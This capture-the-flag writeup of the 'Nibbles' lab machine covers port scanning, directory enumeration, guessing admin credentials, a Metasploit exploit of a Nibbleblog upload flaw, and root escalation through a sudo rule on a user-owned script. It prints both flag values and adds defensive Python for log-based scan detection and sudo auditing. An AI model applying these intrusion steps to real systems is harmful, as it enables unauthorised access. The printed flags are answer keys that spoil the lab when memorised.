Introduction
The following writeup shows the process I used to capture the user and root flags on the Nibbles machine at 10.10.10.75.
This document contains the field notes I took while working through the box.
My way of thinking
The first step is the reconnaissance phase: port scanning, banner grabbing, looking for misconfigurations and so on. The second is to find the weakness, then comes the attack itself, and finally the privilege escalation, also called the “post exploitation phase”.
Personal note: the post exploitation was quite complex; I will do my best to explain how I rooted the “Nibbles machine”.
Subscript: Something was hidden, and the goal was to find the GHOST!!! Let’s roll with our genius Homer Simpson ;)
Ports scanning
During this step we identify the target to see what is behind the IP address.
BTW, the results are below:
sudo nmap 10.10.10.75
Starting Nmap 7.40 (https://nmap.org) at 2018-02-20 17:
Nmap scan report for 10.10.10.75
Host is up (0.023s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
80/tcp open http
22/tcp open ssh
Uptime guess: 198.840 days (since Sat Aug 5 22:12:12 2017)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 18.88 seconds
Explanations
The remote system runs Linux (we don’t know the distribution yet).
The system exposes a web server (80/tcp) and a remote access service (SSH on 22/tcp).
With these elements in hand, we are going to check these two services. For the first one we opened our browser; for the second one, a terminal with basic credentials.
Step 1.1 The Web server:
The result of our browsing is a simple “Hello world”!
Hello world page
Step 1.2 The remote access:
The result of the basic SSH connection in our terminal.
Identification
Let’s take a look at the headers of the web server:
curl -I 10.10.10.75
HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=UTF-8
The next reflex is to look at the page source for anything interesting. It could be nice ;)
The website source code
So, we found a comment in the source code. Is this our ghost?
The next step is to browse to the newly discovered directory (/nibbleblog/) on the IP address.
Nibbleblog access without being logged in
Our remote system is a simple web server running Apache 2.4.18.
Enumeration
At this point of the challenge, we know more about the machine. So, we enumerated the directories of the website.
sudo python3 dirsearch.py -u http://10.10.10.75/nibbleblog -e -f -x 400,403,404
[sudo] password for root:
dirsearch v0.3.8
Extensions: -f | Threads: 10 | Wordlist size: 6038
Error Log: /home/user/Documents/pentesting/tools/web/dirsearch/logs/errors-18-02-21_00-45-19.log
Target: http://10.10.10.75/nibbleblog
[00:45:19] Starting:
[00:45:22] 301 - 321B - /nibbleblog/admin -> http://10.10.10.75/nibbleblog/admin/
[00:45:22] 200 - 48B - /nibbleblog/admin.php
[00:45:22] 200 - 2KB - /nibbleblog/admin/
[00:45:22] 200 - 2KB - /nibbleblog/admin/?/login
[00:45:23] 301 - 332B - /nibbleblog/admin/js/tinymce -> http://10.10.10.75/nibbleblog/admin/js/tinymce/
[00:45:23] 200 - 2KB - /nibbleblog/admin/js/tinymce/
[00:45:28] 301 - 323B - /nibbleblog/content -> http://10.10.10.75/nibbleblog/content/
[00:45:31] 200 - 48B - /nibbleblog/index.php
[00:45:31] 200 - 48B - /nibbleblog/index.php/login/
[00:45:31] 200 - 78B - /nibbleblog/install.php
[00:45:32] 301 - 325B - /nibbleblog/languages -> http://10.10.10.75/nibbleblog/languages/
[00:45:32] 200 - 34KB - /nibbleblog/LICENSE.txt
[00:45:35] 301 - 323B - /nibbleblog/plugins -> http://10.10.10.75/nibbleblog/plugins/
[00:45:35] 200 - 5KB - /nibbleblog/README
[00:45:38] 301 - 322B - /nibbleblog/themes -> http://10.10.10.75/nibbleblog/themes/
Directories enumeration
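From the defender’s side, a scan like this leaves a clear footprint in the Apache access log: one client requesting many paths that do not exist within a few seconds. The following Python snippet is an added example, not part of the original writeup or of dirsearch; it parses combined-format log lines and flags clients with a burst of distinct 403/404 paths. The log lines, client addresses and wordlist are constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log format: client, ident, user, [time], "METHOD path proto", status, ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def parse(line):
    """Return (ip, timestamp, path, status) for one access-log line, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), path, int(status)

def find_scanners(lines, window=timedelta(seconds=10), min_misses=8):
    """Flag clients that hit at least `min_misses` distinct 403/404 paths within `window`.
    A wordlist scan probes many paths that do not exist, so a high miss count in a short
    time separates it from a browser following links on the site."""
    by_ip = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        by_ip[rec[0]].append(rec)
    flagged = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r[1])
        for i, (_, start, _, _) in enumerate(recs):
            misses = {p for _, t, p, s in recs[i:] if t - start <= window and s in (403, 404)}
            if len(misses) >= min_misses:
                flagged[ip] = (start, len(misses))
                break
    return flagged

# Constructed sample traffic (not from the writeup): 10.10.14.2 runs a wordlist against
# /nibbleblog/, 192.168.1.20 browses normally and trips a single 404.
WORDS = ["backup", "old", "test", "dev", "tmp", "cgi-bin", "uploads", "db", "config", "logs"]

def _line(ip, sec, path, status):
    return (f'{ip} - - [21/Feb/2018:00:45:{sec:02d} +0100] '
            f'"GET {path} HTTP/1.1" {status} 275 "-" "Mozilla/5.0"')

SAMPLE_LOG = [_line("10.10.14.2", 22 + i // 4, f"/nibbleblog/{w}", 404) for i, w in enumerate(WORDS)]
SAMPLE_LOG += [_line("10.10.14.2", 22, "/nibbleblog/admin.php", 200),
               _line("192.168.1.20", 20, "/nibbleblog/", 200),
               _line("192.168.1.20", 40, "/nibbleblog/index.php", 200),
               _line("192.168.1.20", 55, "/nibbleblog/missing.css", 404)]

if __name__ == "__main__":
    for ip, (when, n) in find_scanners(SAMPLE_LOG).items():
        print(f"{ip}: {n} distinct 403/404 paths within 10s starting at {when:%H:%M:%S}")
```

Tune `window` and `min_misses` to the site: a blog with a few dozen pages rarely produces eight distinct 404s from one visitor in ten seconds.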
Further enumeration
The directory enumeration phase reveals some very interesting folders. Some of them are left over from the default installation (misconfigurations).
Below are the directories found:
http://10.10.10.75/nibbleblog/admin.php
http://10.10.10.75/nibbleblog/admin/?/login
http://10.10.10.75/nibbleblog/admin/js/tinymce/
http://10.10.10.75/nibbleblog/content/
http://10.10.10.75/nibbleblog/index.php
http://10.10.10.75/nibbleblog/index.php/login
http://10.10.10.75/nibbleblog/install.php
http://10.10.10.75/nibbleblog/languages/
http://10.10.10.75/nibbleblog/plugins/
http://10.10.10.75/nibbleblog/README
http://10.10.10.75/nibbleblog/themes/
As you can see, the only one which is interesting for us is the admin page.
http://10.10.10.75/nibbleblog/admin.php
Admin access point
With this element we can log in to the blog as admin. Then we’ll compromise the system through this attack vector.
Now that we have found the admin interface, we are going to try brute force to find valid credentials.
Once the process was running, we noticed that the system has a protection in place (anti-brute-force with a blacklist).
Error login Access
Well, we were blocked for around 5 minutes with the error page above.
So, the only solution in our situation was guessing (to avoid detection). The username could be ‘admin’ or ‘administrator’ and the password ‘nibbles’ or ‘nibble’.
After this guessing step, we found the credentials. These are:
- Username: admin
- Password: nibbles
By the way, we’re almost in!! So, what’s next?
The Weakness
Let’s talk about the access point we could exploit. Now that we were in, the next step was to browse the blog with administrator access.
We explored the blog page by page, with the help of the previous step (directory enumeration). So, let’s go ;)
Using our enumeration, we browsed to an interesting page which shows the plugins (the others were not interesting for us because they have no upload function).
So, as we can see, there is one good thing: “My image / Configure”. It allows us to upload pictures to the blog. But it’s HUGE for us, because we could upload a backdoor to interact with the host system.
Plugins Access
In more detail, we browsed the specific folder “My_image”.
Plugins directory
Inside the directory
Then we looked at the details of the picture system. By digging deeper into the upload mechanism, we noticed that when a picture was uploaded, nothing in the folder appeared to be updated.
We now have our vulnerability: Nibbleblog File Upload. After some research, this vulnerability corresponds to CVE-2015-6967.
Exploitation
With all the information we’ve got, we can make our intrusion into the remote system.
To do that, we launched a shell to use METASPLOIT. So, let’s start the game ;)
First, update the framework; the latest version is required.
So, the steps required were:
- Searched for the exploit: nibbles
- Configured the exploit
- Configured the payload
- Ran the exploit
Please find below the setup of our intrusion.
Configuration of nibbles exploit
That’s great, we are in! The last step is to escalate privileges to catch the flags.
The next screenshot shows that we are well in the server.
meterpreter > sysinfo
Computer : Nibbles
OS : Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter >
Privilege Escalation
Once in, we had to find the flags. The first one was the user flag, and the second one the root flag of the machine.
- The user flag was easy because we found the user directory and the text file in it.
- The root flag (system admin) was more complex! One hint was given ;)
When we got in, we were at the root of the website. So, the only solution for me was to find the user directory and catch the flag.
So, in MSF, just use the Linux commands for it.
In the listing, some directories have been removed for easier reading.
Always know where you are and where you want to go!!
meterpreter > ls
Listing: /var/www/html/nibbleblog/content/private/plugins/my_image
==================================================================
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  14160  fil   2018-02-21 15:59:02 +0100  cowroot
100644/rw-r--r--  258    fil   2018-02-21 17:44:55 +0100  db.xml
100644/rw-r--r--  1292   fil   2018-02-21 16:39:25 +0100  image.
100644/rw-r--r--  1113   fil   2018-02-21 16:03:40 +0100  image.bin
100644/rw-r--r--  1113   fil   2018-02-21 16:18:23 +0100  image.jpeg
meterpreter > cd ..
meterpreter > cd home
meterpreter > cd home
meterpreter > ls
Listing: /home
==============
Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2018-02-21 15:59:22 +0100  nibbler
meterpreter > cd nibbler
meterpreter > ls
Listing: /home/nibbler
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100400/r--------  33    fil   2017-12-29 11:43:54 +0100  user.txt
meterpreter > cat user.txt
b02ff32bb332deba49eeaed21152c8d8
In order to catch the ultimate flag, we had to drop into shell mode to work more easily. So, I tested the version of sudo and did some investigation.
The most important finding for rooting the server was:
User nibbler may run the following commands on Nibbles: (root)
NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
***Possible Sudo PWNAGE!
-rwxr-xr-x 1 nibbler nibbler 23 Feb 21 13:18 /home/nibbler/personal/stuff/monitor.sh
Let’s roll for the root flag?
meterpreter > shell
Channel 1 created.
head -n 8 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
***Possible Sudo PWNAGE!
-rwxr-xr-x 1 nibbler nibbler 23 Feb 21 13:18 /home/nibbler/personal/stuff/monitor.sh
chmod 777 /home/nibbler ./monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$
sudo -u root /home/nibbler/personal/stuff/monitor.sh
root@Nibbles:/#
pwd
/root
root@Nibbles:~# cat root.txt
b6d745c0dfb6457c55591efc898ef88c
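The root cause of this escalation is a NOPASSWD sudo rule pointing at a script owned by the very user who is allowed to run it as root. The following Python audit is an added example, not part of the writeup or of any enumeration tool: it parses `sudo -l` and `ls -l` output of the shape shown above and reports commands whose file, or any parent directory, the user could modify. The inputs are constructed; the apt-get rule and its `ls -l` line are assumptions added as a benign comparison.

```python
import os
import re
from collections import namedtuple

Rule = namedtuple("Rule", "runas nopasswd command")
FileInfo = namedtuple("FileInfo", "mode owner group path")
# "(root) NOPASSWD: /path" as printed by `sudo -l`, even when fused onto the header line.
RULE_RE = re.compile(r"\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/\S+)")
# `ls -l` line ending in an absolute path: mode, links, owner, group, size, month, day, time, path.
LS_RE = re.compile(r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
                   r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>/\S+)")

def parse_sudo_l(text):
    return [Rule(m["runas"], "NOPASSWD:" in m["tags"], m["cmd"]) for m in RULE_RE.finditer(text)]

def parse_ls_line(line):
    m = LS_RE.match(line.strip())
    return FileInfo(m["mode"], m["owner"], m["group"], m["path"]) if m else None

def user_can_modify(fi, user, groups=()):
    """The owner can always chmod or replace the file; others need a group or world write bit."""
    perms = fi.mode[1:]
    return fi.owner == user or (fi.group in groups and perms[4] == "w") or perms[7] == "w"

def audit(sudo_l_text, ls_lines, user, groups=()):
    """Report sudo commands `user` could tamper with. The command file itself or any parent
    directory being modifiable is enough, because the file can then be swapped out."""
    inventory = {f.path: f for f in map(parse_ls_line, ls_lines) if f}
    findings = []
    for rule in parse_sudo_l(sudo_l_text):
        path = rule.command
        while path != "/":
            fi = inventory.get(path)
            if fi and user_can_modify(fi, user, groups):
                findings.append((rule.command, path, rule.runas, rule.nopasswd))
                break
            path = os.path.dirname(path)
    return findings

# Constructed inputs shaped like the writeup's `sudo -l` and `ls -l` output (apt-get rule assumed).
SUDO_L = ("User nibbler may run the following commands on Nibbles:\n"
          "    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh\n"
          "    (root) /usr/bin/apt-get\n")
LS = ["-rwxr-xr-x 1 nibbler nibbler 23 Feb 21 13:18 /home/nibbler/personal/stuff/monitor.sh",
      "-rwxr-xr-x 1 root root 1328 Jan 12  2018 /usr/bin/apt-get"]

if __name__ == "__main__":
    for cmd, weak, runas, nopw in audit(SUDO_L, LS, "nibbler"):
        print(f"{cmd} runs as {runas}{' without a password' if nopw else ''}; {weak} is modifiable by nibbler")
```

The fix on the box side is the same the audit implies: sudo rules should only reference binaries and scripts owned by root in root-owned directories.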